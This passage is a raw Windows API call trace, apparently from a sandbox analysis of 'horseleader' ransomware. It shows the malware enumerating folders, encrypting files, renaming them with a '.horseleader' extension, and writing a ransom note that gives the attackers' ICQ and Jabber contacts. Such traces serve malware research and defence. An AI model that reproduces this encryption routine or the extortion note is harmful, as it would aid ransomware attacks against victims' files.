(lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\smarttaginstall.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\smarttaginstall.exe.horseleader")) returned 1 [0245.707] GetProcessHeap () returned 0x780000 [0245.707] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.707] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5de00200, ftCreationTime.dwHighDateTime=0x1cac9ac, ftLastAccessTime.dwLowDateTime=0x6d2e6230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5de00200, ftLastWriteTime.dwHighDateTime=0x1cac9ac, nFileSizeHigh=0x0, nFileSizeLow=0x3d80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SmartTagInstall.exe", cAlternateFileName="SMARTT~1.EXE")) returned 0 [0245.707] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0245.707] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\#Decrypt#.txt") returned 74 [0245.707] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0245.708] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation 
instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0245.708] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0245.709] lstrlenA (lpString="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") returned 1368 [0245.709] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0245.709] CloseHandle (hObject=0x21c) returned 1 [0245.709] GetProcessHeap () returned 0x780000 [0245.709] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0245.709] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0245.709] lstrcmpiW (lpString1="Source Engine", lpString2="Windows") returned -1 [0245.709] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine") returned 64 [0245.709] lstrcmpW (lpString1="Source Engine", lpString2=".") returned 1 [0245.709] lstrcmpW (lpString1="Source Engine", lpString2="..") returned 1 [0245.710] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.710] GetProcessHeap () returned 0x780000 [0245.710] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0245.710] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*") returned 66 [0245.710] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0245.714] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.714] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\.") returned 66 [0245.714] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.714] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0245.714] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.715] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\..") returned 67 [0245.715] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0245.715] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.715] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfcedc00, ftCreationTime.dwHighDateTime=0x1ca911d, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xcfcedc00, ftLastWriteTime.dwHighDateTime=0x1ca911d, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSE.EXE", cAlternateFileName="")) returned 1 [0245.715] lstrcmpiW (lpString1="OSE.EXE", lpString2="Windows") returned -1 [0245.715] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE") returned 72 [0245.715] StrStrIW (lpFirst="OSE.EXE", lpSrch=".horseleader") returned 0x0 [0245.715] lstrcmpW (lpString1="OSE.EXE", lpString2="#Decrypt#.txt") returned 1 [0245.715] lstrcmpW (lpString1="OSE.EXE", lpString2="_uninstalling_.png") returned 1 [0245.715] lstrlenW (lpString=".testttjffg") returned 11 [0245.715] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE", lpSrch=".testttjffg") returned 0x0 [0245.715] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.715] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.715] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.716] 
lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE") returned 72 [0245.716] StrStrW (lpFirst="OSE.EXE", lpSrch=".txt") returned 0x0 [0245.716] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=174440) returned 1 [0245.716] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.716] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.720] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.720] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.720] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x12cb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.721] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.721] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.721] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.721] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x25968, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0245.722] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.723] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.723] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.724] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.724] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.724] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.724] CloseHandle (hObject=0x158) returned 1 [0245.724] GetProcessHeap () returned 0x780000 [0245.724] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.724] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE.horseleader") returned 84 [0245.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE.horseleader" 
(normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe.horseleader")) returned 1 [0245.725] GetProcessHeap () returned 0x780000 [0245.725] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.725] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfcedc00, ftCreationTime.dwHighDateTime=0x1ca911d, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xcfcedc00, ftLastWriteTime.dwHighDateTime=0x1ca911d, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSE.EXE", cAlternateFileName="")) returned 0 [0245.726] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0245.726] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\#Decrypt#.txt") returned 78 [0245.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0245.726] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0245.727] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0245.728] lstrlenA (lpString="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") returned 1368 [0245.728] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0245.728] CloseHandle (hObject=0x21c) returned 1 [0245.728] GetProcessHeap () returned 0x780000 [0245.728] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0245.728] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0245.728] lstrcmpiW (lpString1="Stationery", lpString2="Windows") returned -1 [0245.728] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery") returned 61 [0245.728] lstrcmpW (lpString1="Stationery", lpString2=".") returned 1 [0245.728] lstrcmpW (lpString1="Stationery", lpString2="..") returned 1 [0245.728] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.728] GetProcessHeap () returned 0x780000 [0245.728] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0245.729] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*") returned 63 [0245.729] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0245.732] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.732] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\.") returned 63 [0245.732] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.732] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0245.733] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.733] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\..") returned 64 [0245.733] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.733] lstrcmpW 
(lpString1="..", lpString2="..") returned 0 [0245.733] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2608de, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2608de, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xcdfff30e, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Bears.htm", cAlternateFileName="")) returned 1 [0245.733] lstrcmpiW (lpString1="Bears.htm", lpString2="Windows") returned -1 [0245.733] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 71 [0245.733] StrStrIW (lpFirst="Bears.htm", lpSrch=".horseleader") returned 0x0 [0245.733] lstrcmpW (lpString1="Bears.htm", lpString2="#Decrypt#.txt") returned 1 [0245.733] lstrcmpW (lpString1="Bears.htm", lpString2="_uninstalling_.png") returned 1 [0245.733] lstrlenW (lpString=".testttjffg") returned 11 [0245.734] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm", lpSrch=".testttjffg") returned 0x0 [0245.734] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.734] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.734] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.734] FindNextFileW 
(in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa352261, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Bears.jpg", cAlternateFileName="")) returned 1 [0245.734] lstrcmpiW (lpString1="Bears.jpg", lpString2="Windows") returned -1 [0245.734] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 71 [0245.734] StrStrIW (lpFirst="Bears.jpg", lpSrch=".horseleader") returned 0x0 [0245.734] lstrcmpW (lpString1="Bears.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.735] lstrcmpW (lpString1="Bears.jpg", lpString2="_uninstalling_.png") returned 1 [0245.735] lstrlenW (lpString=".testttjffg") returned 11 [0245.735] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg", lpSrch=".testttjffg") returned 0x0 [0245.735] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.735] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.735] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.735] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ca9e3b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ca9e3b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4421c165, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa0f, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Blue_Gradient.jpg", cAlternateFileName="")) returned 1 [0245.735] lstrcmpiW (lpString1="Blue_Gradient.jpg", lpString2="Windows") returned -1 [0245.735] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 79 [0245.735] StrStrIW (lpFirst="Blue_Gradient.jpg", lpSrch=".horseleader") returned 0x0 [0245.735] lstrcmpW (lpString1="Blue_Gradient.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.735] lstrcmpW (lpString1="Blue_Gradient.jpg", lpString2="_uninstalling_.png") returned 1 [0245.735] lstrlenW (lpString=".testttjffg") returned 11 [0245.735] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpSrch=".testttjffg") returned 0x0 [0245.735] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.736] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.736] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.737] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | 
